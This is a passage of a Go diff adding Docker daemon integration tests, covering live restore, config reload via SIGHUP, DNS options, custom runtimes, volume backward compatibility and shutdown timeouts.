"--name=test", "busybox") + c.Assert(err, check.NotNil, check.Commentf("expected error trying to create container with duplicate name")) + // this one is no longer needed, removing simplifies the remainder of the test + out, err = s.d.Cmd("rm", "-f", "test") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("ps", "-a", "--no-trunc") + c.Assert(err, check.IsNil, check.Commentf(out)) + + lines := strings.Split(strings.TrimSpace(out), "\n")[1:] + + test2validated := false + test3validated := false + for _, line := range lines { + fields := strings.Fields(line) + names := fields[len(fields)-1] + switch fields[0] { + case test2ID: + c.Assert(names, check.Equals, "test2,test3/abc") + test2validated = true + case test3ID: + c.Assert(names, check.Equals, "test3") + test3validated = true + } + } + + c.Assert(test2validated, check.Equals, true) + c.Assert(test3validated, check.Equals, true) +} + +// TestDaemonRestartWithKilledRunningContainer requires live restore of running containers +func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check.C) { + // TODO(mlaventure): Not sure what would the exit code be on windows + testRequires(t, DaemonIsLinux) + if err := s.d.StartWithBusybox(); err != nil { + t.Fatal(err) + } + + cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") + defer s.d.Stop() + if err != nil { + t.Fatal(cid, err) + } + cid = strings.TrimSpace(cid) + + pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", cid) + t.Assert(err, check.IsNil) + pid = strings.TrimSpace(pid) + + // Kill the daemon + if err := s.d.Kill(); err != nil { + t.Fatal(err) + } + + // kill the container + runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", cid) + if out, ec, err := runCommandWithOutput(runCmd); err != nil { + t.Fatalf("Failed to run ctr, ExitCode: %d, err: '%v' output: '%s' cid: '%s'\n", ec, err, out, cid) + } + + // Give time to 
containerd to process the command if we don't + // the exit event might be received after we do the inspect + pidCmd := exec.Command("kill", "-0", pid) + _, ec, _ := runCommandWithOutput(pidCmd) + for ec == 0 { + time.Sleep(1 * time.Second) + _, ec, _ = runCommandWithOutput(pidCmd) + } + + // restart the daemon + if err := s.d.Start(); err != nil { + t.Fatal(err) + } + + // Check that we've got the correct exit code + out, err := s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", cid) + t.Assert(err, check.IsNil) + + out = strings.TrimSpace(out) + if out != "143" { + t.Fatalf("Expected exit code '%s' got '%s' for container '%s'\n", "143", out, cid) + } + +} + +// os.Kill should kill daemon ungracefully, leaving behind live containers. +// The live containers should be known to the restarted daemon. Stopping +// them now, should remove the mounts. +func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) { + testRequires(c, DaemonIsLinux) + c.Assert(s.d.StartWithBusybox("--live-restore"), check.IsNil) + + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + id := strings.TrimSpace(out) + + c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + + // container mounts should exist even after daemon has crashed. + comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + + // restart daemon. + if err := s.d.Restart("--live-restore"); err != nil { + c.Fatal(err) + } + + // container should be running. 
+ out, err = s.d.Cmd("inspect", "--format={{.State.Running}}", id) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + out = strings.TrimSpace(out) + if out != "true" { + c.Fatalf("Container %s expected to stay alive after daemon restart", id) + } + + // 'docker stop' should work. + out, err = s.d.Cmd("stop", id) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + // Now, container mounts should be gone. + mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) + comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) +} + +// TestDaemonRestartWithUnpausedRunningContainer requires live restore of running containers. +func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *check.C) { + // TODO(mlaventure): Not sure what would the exit code be on windows + testRequires(t, DaemonIsLinux) + if err := s.d.StartWithBusybox("--live-restore"); err != nil { + t.Fatal(err) + } + + cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") + defer s.d.Stop() + if err != nil { + t.Fatal(cid, err) + } + cid = strings.TrimSpace(cid) + + pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", cid) + t.Assert(err, check.IsNil) + + // pause the container + if _, err := s.d.Cmd("pause", cid); err != nil { + t.Fatal(cid, err) + } + + // Kill the daemon + if err := s.d.Kill(); err != nil { + t.Fatal(err) + } + + // resume the container + result := icmd.RunCommand( + ctrBinary, + "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", + "containers", "resume", cid) + t.Assert(result, icmd.Matches, icmd.Success) + + // Give time to containerd to process the command if we don't + // the resume event might be received after we do the inspect + waitAndAssert(t, defaultReconciliationTimeout, 
func(*check.C) (interface{}, check.CommentInterface) { + result := icmd.RunCommand("kill", "-0", strings.TrimSpace(pid)) + return result.ExitCode, nil + }, checker.Equals, 0) + + // restart the daemon + if err := s.d.Start("--live-restore"); err != nil { + t.Fatal(err) + } + + // Check that we've got the correct status + out, err := s.d.Cmd("inspect", "-f", "{{.State.Status}}", cid) + t.Assert(err, check.IsNil) + + out = strings.TrimSpace(out) + if out != "running" { + t.Fatalf("Expected exit code '%s' got '%s' for container '%s'\n", "running", out, cid) + } + if _, err := s.d.Cmd("kill", cid); err != nil { + t.Fatal(err) + } +} + +// TestRunLinksChanged checks that creating a new container with the same name does not update links +// this ensures that the old, pre gh#16032 functionality continues on +func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support links + err := s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "--name=test2", "--link=test:abc", "busybox", "sh", "-c", "ping -c 1 abc") + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "1 packets transmitted, 1 packets received") + + out, err = s.d.Cmd("rm", "-f", "test") + c.Assert(err, check.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "-d", "--name=test", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("start", "-a", "test2") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") + + err = s.d.Restart() + c.Assert(err, check.IsNil) + out, err = s.d.Cmd("start", "-a", "test2") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") +} + 
+func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) { + testRequires(c, DaemonIsLinux, NotPpc64le) + + infoLog := "\x1b[34mINFO\x1b" + + p, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer func() { + tty.Close() + p.Close() + }() + + b := bytes.NewBuffer(nil) + go io.Copy(b, p) + + // Enable coloring explicitly + s.d.StartWithLogFile(tty, "--raw-logs=false") + s.d.Stop() + c.Assert(b.String(), checker.Contains, infoLog) + + b.Reset() + + // Disable coloring explicitly + s.d.StartWithLogFile(tty, "--raw-logs=true") + s.d.Stop() + c.Assert(b.String(), check.Not(checker.Contains), infoLog) +} + +func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) { + testRequires(c, DaemonIsLinux, NotPpc64le) + + debugLog := "\x1b[37mDEBU\x1b" + + p, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer func() { + tty.Close() + p.Close() + }() + + b := bytes.NewBuffer(nil) + go io.Copy(b, p) + + s.d.StartWithLogFile(tty, "--debug") + s.d.Stop() + c.Assert(b.String(), checker.Contains, debugLog) +} + +func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + daemonConfig := `{ "debug" : false }` + configFile, err := ioutil.TempFile("", "test-daemon-discovery-backend-config-reload-config") + c.Assert(err, checker.IsNil, check.Commentf("could not create temp file for config reload")) + configFilePath := configFile.Name() + defer func() { + configFile.Close() + os.RemoveAll(configFile.Name()) + }() + + _, err = configFile.Write([]byte(daemonConfig)) + c.Assert(err, checker.IsNil) + + // --log-level needs to be set so that d.Start() doesn't add --debug causing + // a conflict with the config + err = s.d.Start("--config-file", configFilePath, "--log-level=info") + c.Assert(err, checker.IsNil) + + // daemon config file + daemonConfig = `{ + "cluster-store": "consul://consuladdr:consulport/some/path", + "cluster-advertise": "192.168.56.100:0", + 
"debug" : false + }` + + err = configFile.Truncate(0) + c.Assert(err, checker.IsNil) + _, err = configFile.Seek(0, os.SEEK_SET) + c.Assert(err, checker.IsNil) + + _, err = configFile.Write([]byte(daemonConfig)) + c.Assert(err, checker.IsNil) + + err = s.d.reloadConfig() + c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config")) + + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: consul://consuladdr:consulport/some/path")) + c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: 192.168.56.100:0")) +} + +// Test for #21956 +func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) { + err := s.d.StartWithBusybox("--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514") + c.Assert(err, check.IsNil) + + out, err := s.d.Cmd("run", "-d", "--log-driver=json-file", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + out, err = s.d.Cmd("inspect", "--format='{{.HostConfig.LogConfig}}'", id) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "{json-file map[]}") +} + +// Test case for #20936, #22443 +func (s *DockerDaemonSuite) TestDaemonMaxConcurrency(c *check.C) { + c.Assert(s.d.Start("--max-concurrent-uploads=6", "--max-concurrent-downloads=8"), check.IsNil) + + expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 6"` + expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) +} + +// Test case for #20936, #22443 +func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := 
os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{ "max-concurrent-downloads" : 8 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"` + expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "max-concurrent-uploads" : 7, "max-concurrent-downloads" : 9 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 7"` + expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 9"` + content, _ = ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) +} + +// Test case for #20936, #22443 +func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{ "max-concurrent-uploads" : null }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 
5"` + expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 3"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "max-concurrent-uploads" : 1, "max-concurrent-downloads" : null }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 1"` + expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` + content, _ = ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "labels":["foo=bar"] }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 5"` + expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` + content, _ = ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) + c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) +} + +func (s *DockerDaemonSuite) TestBuildOnDisabledBridgeNetworkDaemon(c *check.C) { + err := s.d.StartWithBusybox("-b=none", "--iptables=false") + c.Assert(err, check.IsNil) + s.d.c.Logf("dockerBinary %s", dockerBinary) + out, code, err := s.d.buildImageWithOut("busyboxs", + `FROM busybox + RUN cat /etc/hosts`, false) + comment := 
check.Commentf("Failed to build image. output %s, exitCode %d, err %v", out, code, err) + c.Assert(err, check.IsNil, comment) + c.Assert(code, check.Equals, 0, comment) +} + +// Test case for #21976 +func (s *DockerDaemonSuite) TestDaemonDNSInHostMode(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.StartWithBusybox("--dns", "1.2.3.4") + c.Assert(err, checker.IsNil) + + expectedOutput := "nameserver 1.2.3.4" + out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +// Test case for #21976 +func (s *DockerDaemonSuite) TestDaemonDNSSearchInHostMode(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.StartWithBusybox("--dns-search", "example.com") + c.Assert(err, checker.IsNil) + + expectedOutput := "search example.com" + out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +// Test case for #21976 +func (s *DockerDaemonSuite) TestDaemonDNSOptionsInHostMode(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.StartWithBusybox("--dns-opt", "timeout:3") + c.Assert(err, checker.IsNil) + + expectedOutput := "options timeout:3" + out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { + conf, err := ioutil.TempFile("", "config-file-") + c.Assert(err, check.IsNil) + configName := conf.Name() + conf.Close() + defer os.Remove(configName) + + config := ` +{ + "runtimes": { + "oci": { + "path": "docker-runc" + }, + "vm": { + "path": "/usr/local/bin/vm-manager", + "runtimeArgs": [ + "--debug" + ] + } + } 
+} +` + ioutil.WriteFile(configName, []byte(config), 0644) + err = s.d.StartWithBusybox("--config-file", configName) + c.Assert(err, check.IsNil) + + // Run with default runtime + out, err := s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with oci (same path as default) but keep it around + out, err = s.d.Cmd("run", "--name", "oci-runtime-ls", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "vm" + out, err = s.d.Cmd("run", "--rm", "--runtime=vm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Reset config to only have the default + config = ` +{ + "runtimes": { + } +} +` + ioutil.WriteFile(configName, []byte(config), 0644) + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + // Give daemon time to reload config + <-time.After(1 * time.Second) + + // Run with default runtime + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "oci" + out, err = s.d.Cmd("run", "--rm", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Start previously created container with oci + out, err = s.d.Cmd("start", "oci-runtime-ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Check that we can't override the default runtime + config = ` +{ + "runtimes": { + "runc": { + "path": "my-runc" + } + } +} +` + ioutil.WriteFile(configName, []byte(config), 0644) + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + // Give daemon time to reload config 
+ <-time.After(1 * time.Second) + + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, `file configuration validation failed (runtime name 'runc' is reserved)`) + + // Check that we can select a default runtime + config = ` +{ + "default-runtime": "vm", + "runtimes": { + "oci": { + "path": "docker-runc" + }, + "vm": { + "path": "/usr/local/bin/vm-manager", + "runtimeArgs": [ + "--debug" + ] + } + } +} +` + ioutil.WriteFile(configName, []byte(config), 0644) + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + // Give daemon time to reload config + <-time.After(1 * time.Second) + + out, err = s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { + err := s.d.StartWithBusybox("--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") + c.Assert(err, check.IsNil) + + // Run with default runtime + out, err := s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with oci (same path as default) but keep it around + out, err = s.d.Cmd("run", "--name", "oci-runtime-ls", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "vm" + out, err = s.d.Cmd("run", "--rm", "--runtime=vm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Start a daemon without any extra runtimes + 
s.d.Stop() + err = s.d.StartWithBusybox() + c.Assert(err, check.IsNil) + + // Run with default runtime + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Run with "oci" + out, err = s.d.Cmd("run", "--rm", "--runtime=oci", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Start previously created container with oci + out, err = s.d.Cmd("start", "oci-runtime-ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Unknown runtime specified oci") + + // Check that we can't override the default runtime + s.d.Stop() + err = s.d.Start("--add-runtime", "runc=my-runc") + c.Assert(err, check.NotNil) + + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, `runtime name 'runc' is reserved`) + + // Check that we can select a default runtime + s.d.Stop() + err = s.d.StartWithBusybox("--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") + c.Assert(err, check.IsNil) + + out, err = s.d.Cmd("run", "--rm", "busybox", "ls") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") + + // Run with default runtime explicitly + out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + // top1 will exist after daemon restarts + out, err := s.d.Cmd("run", "-d", "--name", "top1", "busybox:latest", "top") + c.Assert(err, checker.IsNil, check.Commentf("run top1: %v", out)) + // top2 will be removed after daemon restarts + out, err = s.d.Cmd("run", "-d", "--rm", "--name", "top2", "busybox:latest", 
"top") + c.Assert(err, checker.IsNil, check.Commentf("run top2: %v", out)) + + out, err = s.d.Cmd("ps") + c.Assert(out, checker.Contains, "top1", check.Commentf("top1 should be running")) + c.Assert(out, checker.Contains, "top2", check.Commentf("top2 should be running")) + + // now restart daemon gracefully + err = s.d.Restart() + c.Assert(err, checker.IsNil) + + out, err = s.d.Cmd("ps", "-a") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(out, checker.Contains, "top1", check.Commentf("top1 should exist after daemon restarts")) + c.Assert(out, checker.Not(checker.Contains), "top2", check.Commentf("top2 should be removed after daemon restarts")) +} + +func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + containerName := "error-values" + // Make a container with both a non 0 exit code and an error message + out, err := s.d.Cmd("run", "--name", containerName, "busybox", "toto") + c.Assert(err, checker.NotNil) + + // Check that those values were saved on disk + out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "127") + + out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) + + // now restart daemon + err = s.d.Restart() + c.Assert(err, checker.IsNil) + + // Check that those values are still around + out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "127") + + out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) + out = strings.TrimSpace(out) + c.Assert(err, checker.IsNil) +} + +func (s *DockerDaemonSuite) TestDaemonBackcompatPre17Volumes(c *check.C) { + testRequires(c, SameHostDaemon) + d := s.d + err := 
d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + // hack to be able to side-load a container config + out, err := d.Cmd("create", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + out, err = d.Cmd("inspect", "--type=image", "--format={{.ID}}", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(d.Stop(), checker.IsNil) + <-d.wait + + imageID := strings.TrimSpace(out) + volumeID := stringid.GenerateNonCryptoID() + vfsPath := filepath.Join(d.root, "vfs", "dir", volumeID) + c.Assert(os.MkdirAll(vfsPath, 0755), checker.IsNil) + + config := []byte(` + { + "ID": "` + id + `", + "Name": "hello", + "Driver": "` + d.storageDriver + `", + "Image": "` + imageID + `", + "Config": {"Image": "busybox:latest"}, + "NetworkSettings": {}, + "Volumes": { + "/bar":"/foo", + "/foo": "` + vfsPath + `", + "/quux":"/quux" + }, + "VolumesRW": { + "/bar": true, + "/foo": true, + "/quux": false + } + } + `) + + configPath := filepath.Join(d.root, "containers", id, "config.v2.json") + err = ioutil.WriteFile(configPath, config, 600) + err = d.Start() + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("inspect", "--type=container", "--format={{ json .Mounts }}", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + type mount struct { + Name string + Source string + Destination string + Driver string + RW bool + } + + ls := []mount{} + err = json.NewDecoder(strings.NewReader(out)).Decode(&ls) + c.Assert(err, checker.IsNil) + + expected := []mount{ + {Source: "/foo", Destination: "/bar", RW: true}, + {Name: volumeID, Destination: "/foo", RW: true}, + {Source: "/quux", Destination: "/quux", RW: false}, + } + c.Assert(ls, checker.HasLen, len(expected)) + + for _, m := range ls { + var matched bool + for _, x := range expected { + if m.Source == x.Source && m.Destination == x.Destination && m.RW == x.RW || m.Name != x.Name { + matched = true + break + } + } + c.Assert(matched, checker.True, 
check.Commentf("did find match for %+v", m)) + } +} + +func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + dockerProxyPath, err := exec.LookPath("docker-proxy") + c.Assert(err, checker.IsNil) + tmpDir, err := ioutil.TempDir("", "test-docker-proxy") + c.Assert(err, checker.IsNil) + + newProxyPath := filepath.Join(tmpDir, "docker-proxy") + cmd := exec.Command("cp", dockerProxyPath, newProxyPath) + c.Assert(cmd.Run(), checker.IsNil) + + // custom one + c.Assert(s.d.StartWithBusybox("--userland-proxy-path", newProxyPath), checker.IsNil) + out, err := s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // try with the original one + c.Assert(s.d.Restart("--userland-proxy-path", dockerProxyPath), checker.IsNil) + out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // not exist + c.Assert(s.d.Restart("--userland-proxy-path", "/does/not/exist"), checker.IsNil) + out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "driver failed programming external connectivity on endpoint") + c.Assert(out, checker.Contains, "/does/not/exist: no such file or directory") +} + +// Test case for #22471 +func (s *DockerDaemonSuite) TestDaemonShutdownTimeout(c *check.C) { + testRequires(c, SameHostDaemon) + + c.Assert(s.d.StartWithBusybox("--shutdown-timeout=3"), check.IsNil) + + _, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGINT) + + select { + case <-s.d.wait: + case <-time.After(5 * time.Second): + } + + expectedMessage := `level=debug msg="start clean shutdown of all containers with a 3 seconds timeout..."` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), 
checker.Contains, expectedMessage) +} + +// Test case for #22471 +func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C) { + testRequires(c, SameHostDaemon) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{ "shutdown-timeout" : 8 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{ "shutdown-timeout" : 5 }` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + select { + case <-s.d.wait: + case <-time.After(3 * time.Second): + } + + expectedMessage := `level=debug msg="Reset Shutdown Timeout: 5"` + content, _ := ioutil.ReadFile(s.d.logFile.Name()) + c.Assert(string(content), checker.Contains, expectedMessage) +} + +// Test case for 29342 +func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) { + testRequires(c, DaemonIsLinux) + s.d.StartWithBusybox("--live-restore") + + out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && top") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + + s.d.waitRun("top") + + 